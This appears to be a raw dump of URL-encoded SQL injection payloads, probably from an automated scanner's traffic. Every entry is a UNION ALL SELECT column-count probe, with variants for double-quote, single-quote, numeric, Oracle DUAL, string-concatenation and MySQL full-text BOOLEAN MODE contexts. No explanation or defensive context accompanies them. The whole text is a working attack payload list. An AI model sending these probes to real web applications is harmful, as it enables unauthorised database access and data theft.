-8120%22%29%20WHERE%207389%3D7389%20UNION%20ALL%20SELECT%207389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%23 -3855%29%20WHERE%206130%3D6130%20UNION%20ALL%20SELECT%206130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%2C6130%23 -3966%29%20WHERE%202549%3D2549%20UNION%20ALL%20SELECT%202549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%2C2549%23 -7839%29%20WHERE%201464%3D1464%20UNION%20ALL%20SELECT%201464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%23 -9011%29%20WHERE%204174%3D4174%20UNION%20ALL%20SELECT%204174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%23 -7235%29%20WHERE%208928%3D8928%20UNION%20ALL%20SELECT%208928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%23 -2668%29%20WHERE%206960%3D6960%20UNION%20ALL%20SELECT%206960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%2C6960%23 -6332%29%20WHERE%205225%3D5225%20UNION%20ALL%20SELECT%205225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%23 -6213%29%20WHERE%205403%3D5403%20UNION%20ALL%20SELECT%205403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%23 -3598%29%20WHERE%205461%3D5461%20UNION%20ALL%20SELECT%205461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%2C5461%23 -9659%29%20WHERE%209306%3D9306%20UNION%20ALL%20SELECT%209306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%23 -7329%27%20WHERE%206671%3D6671%20UNION%20ALL%20SELECT%206671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%23 -1758%27%20WHERE%205969%3D5969%20UNION%20ALL%20SELECT%205969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%23 -7396%27%20WHERE%207870%3D7870%20UNION%20ALL%20SELECT%207870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%2C7870%23 -9841%27%20WHERE%206827%3D6827%20UNION%20ALL%20SELECT%206827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%2C6827%23 -5278%27%20WHERE%202173%3D2173%20UNION%20ALL%20SELECT%202173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%2C2173%23 -8676%27%20WHERE%208552%3D8552%20UNION%20ALL%20SELECT%208552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%23 -4603%27%20WHERE%209291%3D9291%20UNION%20ALL%20SELECT%209291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%2C9291%23 -4093%27%20WHERE%209427%3D9427%20UNION%20ALL%20SELECT%209427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%23 -6069%27%20WHERE%209398%3D9398%20UNION%20ALL%20SELECT%209398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%2C9398%23 -5733%27%20WHERE%206579%3D6579%20UNION%20ALL%20SELECT%206579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%23 -5318%22%20WHERE%205985%3D5985%20UNION%20ALL%20SELECT%205985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%2C5985%23 -7244%22%20WHERE%202487%3D2487%20UNION%20ALL%20SELECT%202487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%2C2487%23 -3485%22%20WHERE%209003%3D9003%20UNION%20ALL%20SELECT%209003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%2C9003%23 -7421%22%20WHERE%203721%3D3721%20UNION%20ALL%20SELECT%203721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%2C3721%23 -6750%22%20WHERE%202553%3D2553%20UNION%20ALL%20SELECT%202553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%2C2553%23 -2151%22%20WHERE%209622%3D9622%20UNION%20ALL%20SELECT%209622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%23 -9756%22%20WHERE%202845%3D2845%20UNION%20ALL%20SELECT%202845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%2C2845%23 -7340%22%20WHERE%207003%3D7003%20UNION%20ALL%20SELECT%207003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%23 -8721%22%20WHERE%201634%3D1634%20UNION%20ALL%20SELECT%201634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%23 -4041%22%20WHERE%207918%3D7918%20UNION%20ALL%20SELECT%207918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%2C7918%23 -7477%20WHERE%206448%3D6448%20UNION%20ALL%20SELECT%206448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%2C6448%23 -3849%20WHERE%207042%3D7042%20UNION%20ALL%20SELECT%207042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%23 -6366%20WHERE%205693%3D5693%20UNION%20ALL%20SELECT%205693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%23 -5242%20WHERE%204124%3D4124%20UNION%20ALL%20SELECT%204124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%23 -8475%20WHERE%205845%3D5845%20UNION%20ALL%20SELECT%205845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%23 -7312%20WHERE%209853%3D9853%20UNION%20ALL%20SELECT%209853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%23 -1912%20WHERE%202494%3D2494%20UNION%20ALL%20SELECT%202494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%2C2494%23 -3659%20WHERE%206339%3D6339%20UNION%20ALL%20SELECT%206339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%23 -5949%20WHERE%207956%3D7956%20UNION%20ALL%20SELECT%207956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%23 -6082%20WHERE%207768%3D7768%20UNION%20ALL%20SELECT%207768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%23 -6564%27%7C%7C%28SELECT%20%27ONUy%27%20FROM%20DUAL%20WHERE%206229%3D6229%20UNION%20ALL%20SELECT%206229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%2C6229%23 -9204%27%7C%7C%28SELECT%20%27XYtr%27%20FROM%20DUAL%20WHERE%209664%3D9664%20UNION%20ALL%20SELECT%209664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%23 -2417%27%7C%7C%28SELECT%20%27STYz%27%20FROM%20DUAL%20WHERE%207993%3D7993%20UNION%20ALL%20SELECT%207993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%2C7993%23 -9601%27%7C%7C%28SELECT%20%27YNPC%27%20FROM%20DUAL%20WHERE%203683%3D3683%20UNION%20ALL%20SELECT%203683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%23 -5657%27%7C%7C%28SELECT%20%27sTpR%27%20FROM%20DUAL%20WHERE%208524%3D8524%20UNION%20ALL%20SELECT%208524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%23 -8821%27%7C%7C%28SELECT%20%27WkXb%27%20FROM%20DUAL%20WHERE%204330%3D4330%20UNION%20ALL%20SELECT%204330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%23 -8523%27%7C%7C%28SELECT%20%27Ietz%27%20FROM%20DUAL%20WHERE%205884%3D5884%20UNION%20ALL%20SELECT%205884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%23 -9935%27%7C%7C%28SELECT%20%27bbTy%27%20FROM%20DUAL%20WHERE%209810%3D9810%20UNION%20ALL%20SELECT%209810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%23 -2349%27%7C%7C%28SELECT%20%27KSgO%27%20FROM%20DUAL%20WHERE%209665%3D9665%20UNION%20ALL%20SELECT%209665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%23 -6779%27%7C%7C%28SELECT%20%27knLk%27%20FROM%20DUAL%20WHERE%201382%3D1382%20UNION%20ALL%20SELECT%201382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%23 -1481%27%7C%7C%28SELECT%20%27lplo%27%20WHERE%207721%3D7721%20UNION%20ALL%20SELECT%207721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%23 -8528%27%7C%7C%28SELECT%20%27wQde%27%20WHERE%207057%3D7057%20UNION%20ALL%20SELECT%207057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%23 -4948%27%7C%7C%28SELECT%20%27bsRg%27%20WHERE%209964%3D9964%20UNION%20ALL%20SELECT%209964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%23 -1164%27%7C%7C%28SELECT%20%27iBFW%27%20WHERE%201424%3D1424%20UNION%20ALL%20SELECT%201424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%23 -8826%27%7C%7C%28SELECT%20%27skQt%27%20WHERE%203948%3D3948%20UNION%20ALL%20SELECT%203948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%23 -3594%27%7C%7C%28SELECT%20%27xPmd%27%20WHERE%204399%3D4399%20UNION%20ALL%20SELECT%204399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%23 -5069%27%7C%7C%28SELECT%20%27vcLn%27%20WHERE%204632%3D4632%20UNION%20ALL%20SELECT%204632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%2C4632%23 -9016%27%7C%7C%28SELECT%20%27UPbX%27%20WHERE%206313%3D6313%20UNION%20ALL%20SELECT%206313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%23 -6930%27%7C%7C%28SELECT%20%27ATgx%27%20WHERE%203881%3D3881%20UNION%20ALL%20SELECT%203881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%23 -2233%27%7C%7C%28SELECT%20%27ljqW%27%20WHERE%209267%3D9267%20UNION%20ALL%20SELECT%209267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%2C9267%23 -4440%27%2B%28SELECT%20UevH%20WHERE%206519%3D6519%20UNION%20ALL%20SELECT%206519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%2C6519%23 -1696%27%2B%28SELECT%20ZcuT%20WHERE%202158%3D2158%20UNION%20ALL%20SELECT%202158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%2C2158%23 -7388%27%2B%28SELECT%20PiIT%20WHERE%201502%3D1502%20UNION%20ALL%20SELECT%201502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%2C1502%23 -3707%27%2B%28SELECT%20zdKm%20WHERE%208805%3D8805%20UNION%20ALL%20SELECT%208805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%2C8805%23 -4044%27%2B%28SELECT%20mEah%20WHERE%207169%3D7169%20UNION%20ALL%20SELECT%207169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%2C7169%23 -3833%27%2B%28SELECT%20UWNb%20WHERE%201188%3D1188%20UNION%20ALL%20SELECT%201188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%23 -9036%27%2B%28SELECT%20DjcC%20WHERE%207665%3D7665%20UNION%20ALL%20SELECT%207665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%23 -6361%27%2B%28SELECT%20OAjb%20WHERE%202302%3D2302%20UNION%20ALL%20SELECT%202302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%2C2302%23 -4744%27%2B%28SELECT%20bCDe%20WHERE%206592%3D6592%20UNION%20ALL%20SELECT%206592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%23 -7990%27%2B%28SELECT%20Kwkz%20WHERE%202671%3D2671%20UNION%20ALL%20SELECT%202671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%23 -4037%27%2B%28SELECT%20%27ppyO%27%20WHERE%209679%3D9679%20UNION%20ALL%20SELECT%209679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%23 -4444%27%2B%28SELECT%20%27TNsI%27%20WHERE%207662%3D7662%20UNION%20ALL%20SELECT%207662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%2C7662%23 -7432%27%2B%28SELECT%20%27nLAJ%27%20WHERE%206339%3D6339%20UNION%20ALL%20SELECT%206339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%2C6339%23 -1288%27%2B%28SELECT%20%27KtZl%27%20WHERE%208991%3D8991%20UNION%20ALL%20SELECT%208991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%2C8991%23 -9536%27%2B%28SELECT%20%27nHnM%27%20WHERE%204859%3D4859%20UNION%20ALL%20SELECT%204859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%23 -2565%27%2B%28SELECT%20%27ovfs%27%20WHERE%203735%3D3735%20UNION%20ALL%20SELECT%203735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%23 -5970%27%2B%28SELECT%20%27VCid%27%20WHERE%206197%3D6197%20UNION%20ALL%20SELECT%206197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%2C6197%23 -4431%27%2B%28SELECT%20%27WNGX%27%20WHERE%202502%3D2502%20UNION%20ALL%20SELECT%202502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%23 -4523%27%2B%28SELECT%20%27IaYd%27%20WHERE%203259%3D3259%20UNION%20ALL%20SELECT%203259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%23 -9030%27%2B%28SELECT%20%27QYau%27%20WHERE%201479%3D1479%20UNION%20ALL%20SELECT%201479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%2C1479%23 -4978%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%2C2436%23 -4504%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%2C5967%23 -5850%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%23 -6075%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%23 -6424%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%2C5049%23 